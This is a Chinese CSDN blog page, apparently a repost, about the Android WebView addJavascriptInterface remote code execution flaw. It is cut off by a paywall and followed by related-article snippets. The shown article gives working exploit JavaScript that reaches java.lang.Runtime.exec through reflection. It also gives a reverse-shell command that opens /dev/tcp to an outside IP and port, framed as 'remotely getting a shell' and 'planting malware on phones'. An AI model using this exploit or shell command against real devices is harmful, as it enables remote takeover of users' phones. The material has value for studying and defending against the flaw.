Android 安全系列之---WebView中接口隐患与手机挂马利用

最新推荐文章于 2021-03-13 22:45:30 发布
最新推荐文章于 2021-03-13 22:45:30 发布
阅读量3.6k 收藏 2
点赞数 1
分类专栏: 精品文章常来看看 Android屌丝攻城狮 Android开发勘误精品
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jackrex/article/details/11110675
版权
本文探讨了Android WebView中的接口安全隐患,详细介绍了如何利用addJavascriptInterface进行本地Java与JavaScript交互的安全问题。从检测利用、远程获取shell、远程挂马到修复措施,逐一剖析了潜在风险。针对Android 4.2以上版本的解决方案,以及在使用JavaScript与Java桥接时的参数验证,都是避免此类问题的关键。
摘要由CSDN通过智能技术生成

WebView中接口隐患与手机挂马利用 


0x00 背景

在android的sdk中封装了webView控件。这个控件主要用开控制的网页浏览。在程序中装载webView控件,可以设置属性(颜色,字体等)。类似PC下directUI的功能。在webView 下有一个非常特殊的接口函数addJavascriptInterface。能实现本地java和js的交互。利用addJavascriptInterface这个接口函数可实现穿透webkit控制android 本机。

0x01 检测利用

一般使用html 来设计应用页面的几乎不可避免的使用到addJavascriptInterface,包含不限于android浏览器。

在android 代码程序一般是这样使用:

1
2
3
settings.setJavaScriptEnabled( true );
settings.setJavaScriptCanOpenWindowsAutomatically( true );
mWebView.addJavascriptInterface( new JSInvokeClass(), "js2java" );

这里可以用

apk->zip->dex->dex2jar->jdgui->java

代码来查找。

但建议用apktool 反编译smali(毕竟不是所有apk都能反编译成java代码)

在smali代码中 则是类似下列的代码:

const-string v0, " js2java "
invoke-virtual {p1, v1, v0},Lcom/tiantianmini/android/browser/module/ac;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V

当检测到存在上述代码时,可以进行进一步验证利用:

在11年,已经有人利用addJavascriptInterface进行文件读写,并放出简单的poc,到12年出现了简单的执行代码的exp。利用的是反射回调java类的内置静态变量。如下列的利用代码;

<script>
function execute(cmdArgs)
{
    return js2java.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
}
…
</script>  

利用java的exec执行linux的shell命令。

0x02 远程获取shell

套用yuange的一句话:Poc远远小于exp的价值。

利用addJavascriptInterface实现shell.

Android内部的armlinux 是没有busybox 的,一些常规弹shell的方法被限制。

使用了java的反弹shell方法

//execute(["/system/bin/sh","-c","exec 5<>/dev/tcp/192.168.1.9/8088;cat <&5 | while read line; do \$line 2>&5 >&5; done"]);

在Nexus One 4.3的android虚拟机 并未成功弹出shell.

后发现android中可执行 nc命令 (阉割版的不带-e的nc)

这里用了nc的另外一种弹shell的方法完成

Exp 内容:

1
2
3
4
5
6
7
8
<script>
function execute(cmdArgs)
{
return XXX.getClass().forName( "java.lang.Runtime"
最低0.47元/天 解锁文章
jackrex
关注
专栏目录
WebView如何让JS与Java安全地互相调用
GY的的专栏
02-26 594
在现在安卓应用原生开发,为了追求开发的效率以及移植的便利性,使用WebView作为业务内容展示与交互的主要载体是个不错的折方案。那么在这种Hybrid(混合式) App,难免就会遇到页面JS需要与Java相互调用,调用Java方法去做那部分网页JS不能完成的功能。 网上的方法可以告诉我们这个时候我们可以使用addjavascriptInterface来注入原生接口到JS,但是在安
Android 应用之安全开发
Android_SE的博客
09-16 1552
大佬:“这个 APP 破解下,可以兼容客户已出货的产品” 我:“这个不合适吧” 大佬:“这个客户对我们很重要” 我:“好吧” 然后,就是通过反编译某 APP ,分析蓝牙交互协议,在新的 APP 去兼容已出货的设备,达到无缝对接。 –这种场景在开发还是比较经常碰到的。 一、引言 随着移动互联网向社会生活的各个领域渗透,APP 的使用越来越广泛。但 Android 系统由于其开源的属性,市场...
WebView接口隐患手机挂马利用
weixin_34279184的博客
03-08 100
livers · 2013/09/04 15:210x00 背景在android的sdk封装了webView控件。这个控件主要用开控制的网页浏览。在程序装载webView控件,可以设置属性(颜色,字体等)。类似PC下directUI的功能。在webView 下有一个非常特殊的接口函数addJavascriptInterface。能实现本地java和js的交互。利用addJavascriptIn...
安卓WebView接口隐患(远程代码执行漏洞)与手机挂马利用
09-16 1711
0×00 背景 在android的sdk封装了webView控件。这个控件主要用开控制的网页浏览。在程序装载webView控件,可以设置属性(颜色,字体等)。类似PC下directUI的功能。在webView 下有一个非常特殊的接口函数addJavascriptInterface。能实现本地java和js的交互。利用addJavascriptInterface这个接口函数可实现穿透webk
Android安全】用户名密码校验实例代码开发及反编译代码
Walter的专栏
11-11 3545
新建一个Android工程加入两个文本框和 MainActivity.java
android 逆向工程 smail 语法学习
LX. 的专栏
09-18 3353
众所周知,android 是开源的,现在市场上反编译别人的劳动果实的人也不少,所以我们也是有必要学习下smail语言,(就是android工程反编译后出的语法语音),看看改怎么给我们的代码 “埋雷” ,才能更好的保护好我们自己的劳动成果。 接下来就让我们来学习下吧~!(事先声明:本人也是初学smail语言,有介绍不当的地方还请海涵,并请指出,大家一起学习) ==================
CM9/CM10来电归属地完整版添加教程!
06-27 1226
CM10添加归属地的方法,希望可以帮到一些需要的朋友 1,提取system/app/Phone.apk,在用解压软件打开提取里面的classes.dex 3,鼠标放到classes.dex 上右键 执行反编译 之后会得到Smali_classes文件夹,找到里面com/android/phone/CallCard.smali文件 4,使用Notepad++文本软件打开CallCard
关于使用webview的一些坑和经验总结
ruilyzhu的博客
03-15 4337
WebView是基于webkit引擎展现web页面的控件,而且越来越多项目在使用hybrid模式,因此我们在日常开发不可避免的回合WebView打交道,也会碰到各种各样的问题,有可能是手机系统版本问题,机型兼容问题,耗电问题,安全漏洞问题,资源释放问题,还罗列一些WebView的小功能点,因此特地总结一下,用来提高开发效率.WebView清空历史记录WebView有提供clearHistory功能
Android:java和javascript相互调用
moshuome的专栏
06-16 3695
一:WebView的简单了解 1.最基本也是最重要的是在AndroidManifest.xml 必须添加访问网络权限  android:name="android.permission.INTERNET" /> 2.如果访问的页面有 Javascript,则 WebView 必须设置支持 Javascript,否则下面都是白扯 WebView.getSettings().setJa
smali语法简析
Jimmy5z的专栏
09-28 1万+
Smali背景: Smali,Baksmali分别是指安卓系统里的Java虚拟机(Dalvik)所使用的一种.dex格式文件的汇编器,反汇编器。其语法是一种宽松式的Jasmin/dedexer语法,而且它实现了.dex格式所有功能(注解,调试信息,线路信息等)。 Smali,Baksmali分别是冰岛语编译器,反编译器的叫法。也许你会问为什么是冰岛语呢,因为Dalvik是一个冰岛渔村
java webview js 安全,webview 漏洞 addJavascriptInterface 漏洞(高风险),求解决
weixin_29061465的博客
03-13 476
以下是安全部门检测出的hbuilder打包的app的漏洞,集成了个推,给出了解决方案无从小手啊,好像只有hbuilder开发者才能改把,这个代码时hbuilder帮我们集成的,有谁解决了吗,请指教!!webview 漏洞(高风险)问题描述:在webView 下有一个非常特殊的接口函数addJavascriptInterface,能实现本地java 和js 的交互。被测应用存在WebView 漏洞...
Android开发】网络编程及Internet应用-获取天气预报
weixin_34404393的博客
06-15 301
在Eclipse创建Android项目,利用之前学过的WebView控件和国天气网提供的天气数据接口,实现获取指定城市的天气预报。 布局文件: res/layout/main.xml:<?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android="http:/...
Carson带你学Android:你不知道的 WebView 使用漏洞
热门推荐
Carson带你学Android
03-22 7万+
前言 现在很多App里都内置了Web网页(Hyprid App),比如说很多电商平台,淘宝、京东、聚划算等等,如下图上述功能是由 AndroidWebView 实现的,但是 WebView 使用过程存在许多漏洞,容易造成用户数据泄露等等危险,而很多人往往会忽视这个问题 今天我将全面介绍 Android WebView的使用漏洞 及其修复方式 阅读本文前请先阅读: Android开发:最
Android 4.2版本以下使用WebView组件addJavascriptInterface方法存在JS漏洞
weixin_34346099的博客
09-23 322
JS注入漏洞存在的Android版本:Android &lt; 4.2 综述:Android的SDK提供了一个WebView组件,用于在应用嵌入一个浏览器来进行网页浏览。WebView组件的addJavascriptInterface方法用于实现本地Java和JavaScript的交互。这个方法可以通过js脚本在本地执行任意Java代码,从而以当前用户身份执行任意命令。尽管Android官...
Android静态安全检测 -> WebView系统隐藏接口漏洞检测
4lwin博客
06-21 8893
WebView系统隐藏接口漏洞检测 - removeJavascriptInterface方法 1. 隐藏接口 searchBoxJavaBridge_ accessibility accessibilityTraversal 2. 触发条件 使用WebView 对应到smali语句的特征:;->getSettings()Landroid/w
Android静态安全检测 -> WebView组件远程代码执行漏洞检测
4lwin博客
06-21 4844
WebView组件远程代码执行漏洞检测 - addJavascriptInterface方法 1. API 继承关系 java.lang.Object android.view.View android.view.ViewGroup android.widget.AbsoluteLayout android.webkit.WebVi
webview 源码追踪addJavascriptInterface(android10)
yanjingjiangjun的专栏
03-12 1865
参考 https://www.jianshu.com/p/182e4985b669 https://www.jianshu.com/p/a8ed39a17f3f webview.java关键代码 private void ensureProviderCreated() { checkThread(); if (mProvider == null) { // As this can get called during the base clas
Android--webview 漏洞 解析
Navan
05-30 1488
1、webview远程代码执行漏洞: 漏洞详情: addJavascriptInterface存在高危远程代码执行漏洞,应尽量避免使用,API 17用@JavascriptInterface 代替addjavascriptInterface;移除系统webkit内置的危险接口searchBoxJavaBridge_,accessibility,accessibilityTravers
webview---TBS服务
飘云博客
12-02 1817
由于公司的一个产品,可能需要在APK内部内嵌WebView,以显示HTML内容,因此花了一点时间做了一些技术方面的小尝试。本文主要针对这个过程做一些简单的记录。 一、为何不直接使用内置的WebView组件? 用Android自带的WebView组件,做过一些较复杂应用的人应该都会发现,这个自带的组件很多时候真是让人无力吐嘈,主要理由有二: AndroidWebView组件,内
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值